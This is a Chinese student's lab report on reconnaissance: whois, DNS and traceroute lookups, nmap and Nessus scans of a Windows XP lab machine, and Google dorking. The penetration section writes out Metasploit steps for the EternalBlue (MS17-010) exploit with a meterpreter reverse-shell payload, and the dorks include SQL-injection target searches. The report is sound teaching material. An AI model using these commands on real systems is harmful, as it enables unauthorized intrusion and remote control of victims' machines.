一、实验内容
(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权
(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
二、实验过程
(一)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息
选择的DNS域名:baidu.com
1、使用whois命令
whois baidu.com
获取信息如下:
DNS注册人:MarkMonitor Inc
DNS注册人联系方式:
(1)邮箱:abusecomplaints@markmonitor.com
(2)电话:+1.2086851750
IP地址所在国家:CN
城市:Beijing
具体地理位置:Beijing Baidu Netcom Science Technology Co., Ltd
2、使用nslookup命令
nslookup baidu.com
获取ip地址如下:
(1)39.156.66.10
(2)110.242.68.66
(1)使用whoise查询39.156.66.10
whois 39.156.66.10
获得信息:
IP注册人:haijun li
邮箱:hostmaster@chinamobile.com
地址: 29,Jinrong Ave, Xicheng district,beijing,100032
电话: +86 1052686688
还有其他信息
(2)使用whoise查询110.242.68.66
whois 110.242.68.66
获得信息:
IP注册人:Kong Lingfei
邮箱:konglf5@chinaunicom.cn
地址: 45, Guang An Street, Shi Jiazhuang City, HeBei Provin
电话: +86-311-86681601
还有其他信息
3、使用dig命令
dig baidu.com
可以看到同样获取了ip地址等信息,与之前获取的一致
4、使用traceroute命令
traceroute baidu.com
发现无法看到数据包到该网站所经过的路由的路径
5、使用tracert命令
该命令实在windows下使用的
tracert baidu.com
发现在抵达110.242.68.66之前经过了如上图的众多路由节点
6、使用在线网站查询
网址:https://uutool.cn/ip/
(1)查询39.156.66.10
(2)查询110.242.68.66
发现除了国家等地址,还有更加具体的经纬度信息和互联网服务提供商信息等
(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(1)和舍友打微信电话并打开抓包
ip查询结果如下:
ip属地为北京市丰台区,与舍友位置一致
(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
靶机:winxp
靶机ip:192.168.198.148
1、ping扫描
nmap -sn 192.168.198.0/24
通过扫描结果可知,靶机在线
2、靶机开放了哪些TCP和UDP端口
通过命令nmap -sT -sU -p- 192.168.198.148
来对靶机TCP和UDP端口进行扫描
开放的端口有:
TCP:135,139,445
UDP:123,137,138,445,500,1027,1900,4500
3、靶机安装了什么操作系统,版本是多少
nmap -O 192.168.198.148
可以看出操作系统是Microsoft Windows XP SP2 或者SP3
4、靶机上安装了哪些服务
nmap -sV 192.168.198.148
可以看出靶机安装了msrpc(微软远程过程调用)、netbios-ssn(网络基本输入输出系统的会话服务)、microsoft-ds(微软网络目录服务)。
(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令
1、下载nessus开源软件,过程参考:https://blog.csdn.net/m0_52985087/article/details/135170187
2、靶机上开放了哪些端口
靶机:winxp
靶机ip:192.168.198.148
点击右上角的new scan,选择host discovery
设置参数:
点击launch,开始扫描:
扫描结果如下:
发现开放了的端口有135,139,445
3、靶机各个端口上网络服务存在哪些安全漏洞
创建new scan,选择advanced scan,并设置参数:
扫描结果如下:
可以看出445端口的SMB/RPC服务存在MS09-001、MS08-067、MS17-010漏洞。
4、你认为如何攻陷靶机环境,以获得系统访问权
(1)MS09-001:
攻击者可以利用该漏洞,通过发送特制的SMB请求,在目标主机上执行任意代码。成功利用该漏洞后,攻击者可以获取到目标系统的完全控制权限。
(2)MS08-067:
攻击者可以通过发送精心构造的SMB请求,导致远程代码执行。该漏洞的利用可以让攻击者在目标系统上执行恶意代码,并可能进一步渗透网络。
(3)MS17-010:
该漏洞允许攻击者通过精心构造的SMB请求,发送恶意数据包到目标计算机,进而远程执行代码。攻击者可以利用该漏洞完全控制受害者系统。
(4)攻击步骤:
扫描目标主机的445端口,确认SMB服务是否开启。
nmap -p 445 --script smb-os-fingerprint <target_ip>
使用工具如Metasploit,检查目标系统是否易受MS09-001、MS08-067或MS17-010漏洞的攻击。
例如,使用Metasploit的auxiliary/scanner/smb/smb_ms17_010模块来检查MS17-010漏洞:
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target_ip>
run
如果目标存在漏洞,可以使用Metasploit等工具尝试利用该漏洞进行远程代码执行。例如,使用Metasploit的exploit/windows/smb/ms17_010_eternalblue模块来利用MS17-010漏洞:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_ip>
run
(五)搜索测试
1、通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题
搜索姓名:
发现都是无关我的信息,没有泄露
搜索学号:
发现有之前写的博客园实验报告信息,没有消息泄露
搜索电话号码:
发现只有号码段所在地区,未泄露信息
搜索身份证号:
发现也没有泄露消息
2、练习使用Google hack搜集技能完成搜索(至少10种搜索方法)
(1)搜索网页标题
intitle: login
搜索标题中包含“login”的页面
(2)搜索特定的URL结构
inurl:"login" "admin"
查找URL中包含“login”和“admin”的页面
(3)搜索特定网站的内容
site:baidu.com "username"
查找baidu.com网站上包含“username”字样的页面
(4) 搜索特定子域名
site:baidu.com -www
搜索会列出baidu.com下所有的子域名,排除www子域
(5)查找密码保护页面
inurl:"password"
该搜索可以帮助你找到登录或密码验证页面,可能会暴露某些弱密码的提示。
(6)搜索特定文件类型
filetype:pdf "批发"
该搜索可以帮助你找到包含“批发”字样的PDF文件。
(7)查找可能包含sql注入的网址
inurl: .php?id=
(8)查找页面内容
intext: admin
查找包含“admin”这个词的页面内容
(9)查找相似页面
related:https://www.besti.edu.cn/
查找与https://www.besti.edu.cn/ 布局相似的页面
(10)查看指定地方的天气
weather:beijing
查看北京的天气
三、问题及解决方案
问题一:在安装nessus的时候一开始在kali上安装,发现注册的时候总是不成功
问题一解决:发现是kali硬盘空间不足了,有两种解决方案:一种是扩容kali空间,一种是在windows下使用nessus,我选择的是后者
问题二:使用tracert命令在kali运行时发现报错
问题二解决:发现tracert是windows下的命令,换windows的cmd下执行得以解决
四、学习感悟、思考等
本次实验让我深入了解了网络安全领域中的信息收集、漏洞扫描和渗透测试的基本方法与技巧。在实验过程中,我首先学习使用了whois、dig和nslookup等工具。使用nmap和Nessus对靶机环境的扫描让我实际感受到漏洞扫描的重要性。通过nmap,我成功识别了靶机的活跃性、开放端口、操作系统及安装服务;而通过Nessus,我发现了靶机上的潜在安全漏洞,这为渗透测试和防护措施提供了有力的依据。实验中也让我认识到,渗透测试不仅仅是技术问题,更需要对系统的全面理解和风险评估。通过Google Hacking技巧的练习,我学习到了如何使用特定的搜索语法来发现网络中的潜在隐私泄漏和信息暴露。这种技能对于信息收集和漏洞挖掘具有重要意义,但同样要注意合法使用,避免侵犯他人隐私。
本次实验不仅让我掌握了网络安全的工具和技术,还加强了对信息安全伦理的认识。
参考资料
- [《CSDN在windows下安装nessus教程》] https://blog.csdn.net/m0_52985087/article/details/135170187